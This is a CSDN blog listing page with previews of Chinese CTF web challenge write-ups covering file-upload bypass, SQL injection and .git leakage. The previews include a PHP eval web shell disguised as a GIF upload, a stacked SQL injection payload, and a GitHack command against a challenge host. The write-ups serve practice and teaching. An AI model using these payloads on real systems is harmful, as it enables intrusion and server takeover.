![](https://img-blog.csdnimg.cn/20201014180756916.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web
L1nr
这个作者很懒,什么都没留下…
展开
-
[SUCTF 2019]CheckIn
[SUCTF 2019]CheckIn考点:文件上传解题:主要过滤就:1.文件类型是否为图片的判断;2:不能包含<?;第一个用gif89a 或者 png 什么的就可以绕过,第二个用变种一句话<script language=php>echo 'a'; @eval($_POST['pass']);</script>绕过;但是图片马穿上去之后并不能被直接读取,因为绕过比较简单就想传一个.htaccess,但是这个东西只适用于apache环境,在这不可行.与之类似的原创 2020-09-25 08:29:56 · 364 阅读 · 0 评论 -
[SUCTF 2019]easy_sql
[SUCTF 2019]easy_sql过滤了很多字符没有去都试出来,尝试了一下存在堆叠注入想用show尝试,没有成功,确实吗解出来,去看了下大佬的wp查询语句为select $_POST || flag from flag并且对post传过来的值进行了过滤。如果输入的内容在预设的arr当中就会返回Nonono.其中的|| 就代表了or,所以当输入1的时候查询就会变成select 1 || flag from flag这时查的就是select 1 from flag所以不管输入什么都是查输入的。因原创 2020-09-25 08:25:24 · 180 阅读 · 0 评论 -
[强网杯 2019]随便注
[强网杯 2019]随便注知识点堆叠注入尝试了一下单引号闭合;存在堆叠注入;过滤了return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);右键看源码有一个注释<!-- sqlmap是没有灵魂的 -->于是试了下sqlmap,可以跑出数据库跑不出表;动手:payload:`1’;show database;show tables;array(2) { [0]=> stri原创 2020-09-25 08:24:35 · 152 阅读 · 0 评论 -
[GXYCTF2019]禁止套娃
[GXYCTF2019]禁止套娃刚开始不知道干嘛,就注册做题思路,扫目录,抓包,都没上面思路,后面尝试了下,.git 泄露用githack扫一下GitHack.py http://d0f994d0-3653-4d8b-98bc-57d26a9a0bab.node3.buuoj.cn/.git/得到index.php<?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){ if (!pr原创 2020-09-25 08:10:18 · 190 阅读 · 0 评论